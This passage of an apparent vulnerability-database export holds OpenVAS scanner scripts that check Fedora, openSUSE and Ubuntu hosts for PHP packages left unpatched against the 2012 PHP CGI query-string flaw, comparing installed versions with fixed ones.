res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp-debuginfo\", rpm:\"php5-gmp-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv-debuginfo\", rpm:\"php5-iconv-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap-debuginfo\", rpm:\"php5-imap-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl\", rpm:\"php5-intl~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl-debuginfo\", rpm:\"php5-intl-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json-debuginfo\", rpm:\"php5-json-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap-debuginfo\", rpm:\"php5-ldap-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring-debuginfo\", rpm:\"php5-mbstring-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt-debuginfo\", rpm:\"php5-mcrypt-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql\", rpm:\"php5-mssql~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql-debuginfo\", rpm:\"php5-mssql-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql-debuginfo\", rpm:\"php5-mysql-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc-debuginfo\", rpm:\"php5-odbc-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl-debuginfo\", rpm:\"php5-openssl-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl-debuginfo\", rpm:\"php5-pcntl-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo-debuginfo\", rpm:\"php5-pdo-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql-debuginfo\", rpm:\"php5-pgsql-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar\", rpm:\"php5-phar~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar-debuginfo\", rpm:\"php5-phar-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix-debuginfo\", rpm:\"php5-posix-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell-debuginfo\", rpm:\"php5-pspell-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline-debuginfo\", rpm:\"php5-readline-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop-debuginfo\", rpm:\"php5-shmop-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp-debuginfo\", rpm:\"php5-snmp-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap-debuginfo\", rpm:\"php5-soap-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets-debuginfo\", rpm:\"php5-sockets-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite-debuginfo\", rpm:\"php5-sqlite-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin-debuginfo\", rpm:\"php5-suhosin-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg-debuginfo\", rpm:\"php5-sysvmsg-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem-debuginfo\", rpm:\"php5-sysvsem-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm-debuginfo\", rpm:\"php5-sysvshm-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy-debuginfo\", rpm:\"php5-tidy-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer-debuginfo\", rpm:\"php5-tokenizer-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx-debuginfo\", rpm:\"php5-wddx-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader-debuginfo\", rpm:\"php5-xmlreader-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc-debuginfo\", rpm:\"php5-xmlrpc-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter-debuginfo\", rpm:\"php5-xmlwriter-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl-debuginfo\", rpm:\"php5-xsl-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip-debuginfo\", rpm:\"php5-zip-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib-debuginfo\", rpm:\"php5-zlib-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:1361412562310864253", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864253", "type": "openvas", "title": "Fedora Update for maniadrive FEDORA-2012-7586", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for maniadrive FEDORA-2012-7586\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081286.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864253\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:26:44 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-7586\");\n script_name(\"Fedora Update for maniadrive FEDORA-2012-7586\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'maniadrive'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"maniadrive on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"maniadrive\", rpm:\"maniadrive~1.2~32.fc16.5\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-11T11:07:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "Check for the Version of maniadrive", "modified": "2018-01-09T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:864253", "href": "http://plugins.openvas.org/nasl.php?oid=864253", "type": "openvas", "title": "Fedora Update for maniadrive FEDORA-2012-7586", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for maniadrive FEDORA-2012-7586\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"maniadrive on Fedora 16\";\ntag_insight = \"ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nervous\n gameplay (tracks almost never exceed one minute). Features: Complex car\n physics, Challenging &quot;story mode&quot;, LAN and Internet mode, Live scores,\n Track editor, Dedicated server with HTTP interface and More than 30 blocks.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081286.html\");\n script_id(864253);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:26:44 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-7586\");\n script_name(\"Fedora Update for maniadrive FEDORA-2012-7586\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of maniadrive\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"maniadrive\", rpm:\"maniadrive~1.2~32.fc16.5\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1437-1", "modified": "2019-03-13T00:00:00", "published": "2012-05-08T00:00:00", "id": "OPENVAS:1361412562310841002", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841002", "type": "openvas", "title": "Ubuntu Update for php5 USN-1437-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1437_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for php5 USN-1437-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1437-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841002\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 12:37:35 +0530 (Tue, 08 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_xref(name:\"USN\", value:\"1437-1\");\n script_name(\"Ubuntu Update for php5 USN-1437-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.04 LTS|12\\.04 LTS|11\\.10|11\\.04|8\\.04 LTS)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1437-1\");\n script_tag(name:\"affected\", value:\"php5 on Ubuntu 12.04 LTS,\n Ubuntu 11.10,\n Ubuntu 11.04,\n Ubuntu 10.04 LTS,\n Ubuntu 8.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"It was discovered that PHP, when used as a stand alone CGI processor\n for the Apache Web Server, did not properly parse and filter query\n strings. This could allow a remote attacker to execute arbitrary code\n running with the privilege of the web server. Configurations using\n mod_php5 and FastCGI were not vulnerable.\n\n This update addresses the issue when the PHP CGI interpreter\n is configured using mod_cgi and mod_actions as described\n in /usr/share/doc/php5-cgi/README.Debian.gz. However,\n if an alternate configuration is used to enable PHP CGI\n processing, it should be reviewed to ensure that command line\n arguments cannot be passed to the PHP interpreter. Please see\n the references for more details and potential mitigation approaches.\");\n\n script_xref(name:\"URL\", value:\"http://people.canonical.com/~ubuntu-security/cve/2012/CVE-2012-2311.html\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.2-1ubuntu4.15\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.10-1ubuntu3.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.6-13ubuntu3.7\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.5-1ubuntu7.8\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.4-2ubuntu5.24\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:1361412562310864261", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864261", "type": "openvas", "title": "Fedora Update for php-eaccelerator FEDORA-2012-7586", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php-eaccelerator FEDORA-2012-7586\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081285.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864261\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:27:52 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-7586\");\n script_name(\"Fedora Update for php-eaccelerator FEDORA-2012-7586\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php-eaccelerator'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"php-eaccelerator on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"php-eaccelerator\", rpm:\"php-eaccelerator~0.9.6.1~9.fc16.5\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:49", 